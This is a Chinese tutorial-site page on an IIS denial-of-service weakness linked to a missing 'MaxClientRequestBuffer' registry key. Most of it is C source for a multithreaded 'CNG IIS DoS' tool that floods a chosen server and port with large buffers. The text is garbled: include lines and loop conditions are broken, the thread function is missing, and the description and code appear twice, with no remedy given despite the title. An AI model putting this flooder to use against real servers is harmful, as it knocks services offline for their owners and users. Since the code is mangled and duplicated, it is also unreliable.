最新下载
热门教程
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
ASP漏洞分析和解决方法(5)
时间:2022-06-30 09:16:38 编辑:袖梨 来源:一聚教程网
17 IIS web server DOS
漏洞描述:
默认情况下,IIS容易被拒绝服务攻击。如果注册表中有一个叫 "MaxClientRequestBuffer" 的键未被创建,针对这种NT系
统的攻击通常能奏效。
"MaxClientRequestBuffer" 这个键用于设置IIS允许接受的输入量。如果 "MaxClientRequestBuffer"
设置为256(bytes),则攻击者通过输入大量的字符请求IIS将被限制在256字节以内。而系统的缺省设置对此不加限制,因此,利用
下面的程序。可以很容易地对IIS server实行DOS攻击:
#include
#include
#define MAX_THREAD 666
void cng();
char *server;
char *buffer;
int port;
int counter = 0;
int current_threads = 0;
int main(int argc, char **argv)
{
WORD tequila;
WSADATA data;
int p;
DWORD tid;
HANDLE hThread[2000];
//This code is as is and sucks as it is. Won't exit correctly and a lot
of other fun things.
//That I didn't want to take the time to do. So just ctrl+c out of the
code.
//Load up cnghack.exe 3 times for charm.
printf("CNG IIS DoS. [email protected] http://www.*e*ey*e.com "For my
beloved." ");
if(argcprintf("Usage: %s [server] [port] ",argv[0]);
exit(1);
}
buffer=malloc(17500);
memset( buffer, 'A', strlen(buffer));
server=argv[1];
port=atoi(argv[2]);
tequila = MAKEWORD( 1, 1 );
printf("Attempting to start winsock... ");
if( (WSAStartup(tequila, &data)) !=0 ){
printf("failed to start winsock. ");
exit(1);
}
else{
printf("started winsock. ");
}
counter = 0;
for(p = 0 ; p hThread[counter] = CreateThread(0,
0,
(LPTHREAD_START_ROUTINE) cng,
( void * )++counter,
0,
&tid);
}
Sleep(250);
while( current_threads )
Sleep(250);
counter = 0;
printf("Terminated Threads. ");
漏洞描述:
默认情况下,IIS容易被拒绝服务攻击。如果注册表中有一个叫 "MaxClientRequestBuffer" 的键未被创建,针对这种NT系
统的攻击通常能奏效。
"MaxClientRequestBuffer" 这个键用于设置IIS允许接受的输入量。如果 "MaxClientRequestBuffer"
设置为256(bytes),则攻击者通过输入大量的字符请求IIS将被限制在256字节以内。而系统的缺省设置对此不加限制,因此,利用
下面的程序。可以很容易地对IIS server实行DOS攻击:
#include
#include
#define MAX_THREAD 666
void cng();
char *server;
char *buffer;
int port;
int counter = 0;
int current_threads = 0;
int main(int argc, char **argv)
{
WORD tequila;
WSADATA data;
int p;
DWORD tid;
HANDLE hThread[2000];
//This code is as is and sucks as it is. Won't exit correctly and a lot
of other fun things.
//That I didn't want to take the time to do. So just ctrl+c out of the
code.
//Load up cnghack.exe 3 times for charm.
printf("CNG IIS DoS. [email protected] http://www.*e*ey*e.com "For my
beloved." ");
if(argcprintf("Usage: %s [server] [port] ",argv[0]);
exit(1);
}
buffer=malloc(17500);
memset( buffer, 'A', strlen(buffer));
server=argv[1];
port=atoi(argv[2]);
tequila = MAKEWORD( 1, 1 );
printf("Attempting to start winsock... ");
if( (WSAStartup(tequila, &data)) !=0 ){
printf("failed to start winsock. ");
exit(1);
}
else{
printf("started winsock. ");
}
counter = 0;
for(p = 0 ; p hThread[counter] = CreateThread(0,
0,
(LPTHREAD_START_ROUTINE) cng,
( void * )++counter,
0,
&tid);
}
Sleep(250);
while( current_threads )
Sleep(250);
counter = 0;
printf("Terminated Threads. ");
相关文章
- 命运圣契命运回廊65层西风流打法 12-17
- 迅雷浏览器手机版APP下载安装包-迅雷浏览器安卓最新正式版下载 12-17
- 天下万象平民玩家职业选择推荐 12-17
- 哔咔漫画iOS入口极速适配-哔咔漫画iOS入口秒速加载 12-17
- 新三国志曹操传马超无双试炼五通关攻略 12-17
- 知乎网页版入口在哪里?直接打开方法 12-17